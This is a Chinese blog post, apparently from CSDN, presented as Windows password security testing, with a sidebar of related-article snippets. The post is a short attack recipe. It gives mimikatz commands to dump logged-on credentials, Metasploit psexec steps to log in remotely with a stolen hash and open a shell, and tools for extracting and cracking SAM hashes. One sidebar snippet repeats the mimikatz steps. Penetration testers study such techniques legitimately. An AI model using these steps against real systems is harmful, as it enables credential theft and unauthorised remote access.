Windows密码安全性测试

最新推荐文章于 2024-05-22 16:42:24 发布
最新推荐文章于 2024-05-22 16:42:24 发布
阅读量714 收藏
点赞数
分类专栏: Windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34304107/article/details/79894269
版权

一、本地管理员密码如何直接提取

1、直接通过mimikatz读取管理员密码

第一条:privilege::debug //提升权限

第二条:sekurlsa::logonpassWords //抓取密码

2、Lazagne 需要本地支持python 

二、本地HASH远程登入

主要通过MSF提供的exploit/windows/smb/psexec模块来完成。

msf>exploit/windows/smb/psexec

msf>set rhost IP 

msf>set SMBUser administrator

msf>set SMBPass ..

msf>exploit 

msf>shell

三、hash秘钥暴力破解

1、通过LC5暴力hash密码

使用gmer直接提权SAM和system文件,或则通过pwdump7

2、使用ophcrack破解系统hash密码

http://simeon.blog.51cto.com/18680/122160

一只没有感情的杀手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透--13--登录认证安全测试
武天旭的博客
09-12 9233
1、密码明文传输 1、漏洞描述 密码明文传输一般存在于web网站登录页面,用户名或者密码采用了明文传输,容易被嗅探软件截取 2、检测条件 确定一个或多个常用应用程序包含的可访问的管理界面。 3、检测方法 1、找到网站或者web系统登录页面或者敏感数据提交页面。 2、通过对网站登录页面的请求进行抓包,工具可用burp、wireshark、filder等等,分析其数据包中相关p...
密码安全性检测简单模拟-python
xiaoyao_zhang的博客
07-18 2173
def check(passpword): c=0 if not password.isalnum(): c+=1 for i in password: if '0'<=i<='9': c+=1 break for i in password: if 'a'...
windows密码安全性测试
weixin_46248422的博客
07-26 1419
1.、直接通过mimikatz读取管理员密码 :可以在cs里面找到这个工具,但是它只能读操作系统密码。lazagne工具可以读所有密码(浏览器、操作系统、邮件系统密码)。 找到.exe文件,然后放到c盘目录下: 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpa ssWords //抓取密码 2.本地hash远程攻击:只能在低版本的kali机上才能成功。在解密不了的情况下使用这种方法。...
Windows 操作系统等保测评二级合规基线整改项-身份鉴别篇
最新发布
qq_57930963的博客
05-22 963
系统上线要求做等保二级怎么做?让我来教你!Windows 操作系统等保测评二级合规基线整改项-身份鉴别篇
安全测试-密码管理
天道酬勤
05-06 559
禁止使用私有或者弱加密算法(比如禁止使用DES, SHA1等,推荐使用AES: 128位, RSA: 2048位, DSA: 2048 位) 采用基于哈希算法和加入盐值(salt)方式安全存储口令信息 密码输入框,可设计为显示密码和隐藏密码切换功能 密码重设和更改操作,需要进行二次合法身份验证 密码重设时,应对注册手机号和邮箱进行有效验证,链接只能发送到预先注册的邮件地址或预先绑定的手机号 临时密码和链接应设计一个短暂的有效期(比如5分钟),防止暴力破解 当密码重新设置时,应短信通知用户是否是本人在操作..
windows权限分析与密码安全测试
qq_34304107的博客
04-11 673
一、windows常见用户system:本地机器上用于最高权限用户administrator:基本上是本地机器上用于最高权限用户guest:拥有极少用户,默认情况被禁用二、windows2003常见用户组administrators:本地机器上用于最高权限用户组backup aperators:类似于administrators,本地机器上用于最高权限用户组guests:与user组权限相同dis...
忘记密码安全测试_“忘记我”和测试
danpu0978的博客
05-18 354
忘记密码安全测试 您的用户在您的Web应用程序上拥有个人资料。 通常,您应该给他们一种删除其个人资料的方法(至少这是欧洲法院的决定 )。 “简单”表示您需要一个/forget-me端点,该端点将删除当前用户的每条数据。 从数据库,文件存储,搜索引擎等。除了让用户至少部分控制自己的数据(是否可以决定是他们的决定)之外,这对开发人员也有好处。 除了包含大量模拟的孤立的单元测试之外,您还可以...
密码安全等级检查
Strive_0902的博客
05-06 2667
小明在卡中心工作,用到的很多系统账号都需要设置安全密码密码如果符合以下规范可以称为安全密码:1、密码至少包含6个字符,至多包含20个字符;2、至少包含一个小写字母,至少包含一个大写字母,至少包含一个数字;3、不能出现连续3个相同的字母。请写一个检查密码是否为安全密码的函数。输入为一个字符串作为密码,输出为将该密码改为安全密码的最小改变次数。如果它已经是安全密码,则返回0。备注:插入、删除、或者替...
Windows登陆密码查看工具
01-18
可以查看Windows登陆密码,32位、64位并附加源码
电脑安装python3.74_安全检查中...
weixin_39759989的博客
11-22 33
+((!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![])+(!+[]+(!![])+!![]+!![]+!![])+(!+[]-(!![]))+(!+[]+(!![])+!![]+!![])+(!+[]+(!![])-[])+(!+[]+(!![])+!![]+!!...
检测Windows安全缺陷工具wesng的学习与使用
Goodric的博客
07-19 1471
全称为WindowsExploitSuggester–NextGeneration。是一个基于Windows实用程序输出的工具,它提供了操作系统易受攻击的漏洞列表,并针对这些漏洞给出漏洞利用实施建议。包括对这些漏洞的任何攻击。支持WindowsXP和Windows11之间的每个Windows操作系统,包括其WindowsServer对应操作系统。下载https。...
安全测试之忘记密码存在的问题
小太阳~
02-26 4443
忘记密码这个功能相对于登录功能来说,是比较容易忽略的,因为大家可能觉得忘记密码(找回密码)比较简单,大多数的思路便是通过用户名、手机、邮件等找回密码,其实这个功能还是存在很多可以攻击的地方,也是比较容易出现安全问题的。第一类:没有使用加密手段场景一: 某网站的忘记密码功能是通过手机号码找回,我输入自己的手机号码,点击发送重置密码短信之后,我查看源代码(或者通过截取post请求),发现验证码存在源代
python windows系统_python检测windows系统是32还是64位
weixin_39625563的博客
11-24 73
通常64的windows系统program files文件夹(用来安装应用程序的默认的默认的目录),有2个,一个是program files另外一个是program files(x86), 而32bit的只有program files这一个文件夹。根据上面这一特点,我们就可以判断windows系统是32还是64位的。import osprg = 'C:Program Files(x86)'if T...
Windows安全中心输入用户名密码
热门推荐
smilife_的博客
04-09 6万+
解决办法 右击任务栏的“网络”图标,打开“打开网络和共享中心”; 点击“更改适配器设置”; 选择上网的网络连接,比如“以太网”和“无线连接”; 右键点击“以太网”选择属性; 单击“身份验证”标签,取消勾选“启用Ieee 802.1x 身份验证”选项,并确定保存。 ...
W13Scan 扫描器挖掘漏洞实践
汤青松博客
12-03 647
一、背景这段时间总想捣鼓扫描器,发现自己的一些想法很多前辈已经做了东西,让我有点小沮丧同时也有点小兴奋,说明思路是对的,我准备站在巨人的肩膀去二次开发,加入一些自己的想法,从freebuf中看到W13Scan扫描器,觉得这个扫描器很酷,准备深入研究。因为我是做PHP开发的,对python不算太熟悉,所以在安装过程中出现了一些问题,把...
安全测试常用几个工具(开源&商业)调研
分享只为更好的获得
08-01 7283
下面介绍了这些工具的主要功能以及教程、书籍、视频等。 端口扫描器:Nmap Nmap是”Network Mapper”的缩写,众所周知,它是一款非常受欢迎的免费开源黑客工具。Nmap被用于发现网络和安全审计。据数据统计,全世界成千上万的系统管理员使用nmap发现网络、检查开放端口、管理服务升级...
Windows上使用Python给用户增加或删除安全策略
kongxx的专栏
04-16 2968
Windows上使用Python给用户增加或删除安全策略在使用Python在 Windows 平台上开发的时候, 有时候我们需要动态增加或删除用户的某些访问策略, 此时我们可以通过LsaAddAccountRights 和LsaRemoveAccountRights API来实现。比如,我们要给用户分配SE_SERVICE_LOGON_NAME安全策略try: user = 'admin'
Python黑客编程基础3网络数据监听和过滤
weixin_33800463的博客
06-28 914
Python黑客编程3网络数据监听和过滤     课程的实验环境如下: •      操作系统:kali Linux 2.0 •      编程工具:Wing IDE •      Python版本:2.7.9 •      涉及到的主要python模块:pypcap,dpkt,scapy,scapy-http   涉及到的几个python网络抓包和分析的模块,dp...
强化Windows网络安全策略与实践
- 推荐使用NTFS格式分区,因为其提供了更好的安全性,可以保护系统文件不受恶意软件侵害。应用程序应与系统分区分开,避免通过应用程序漏洞导致系统文件泄露或管理员权限被盗。 3. **系统版本选择**: - 建议使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值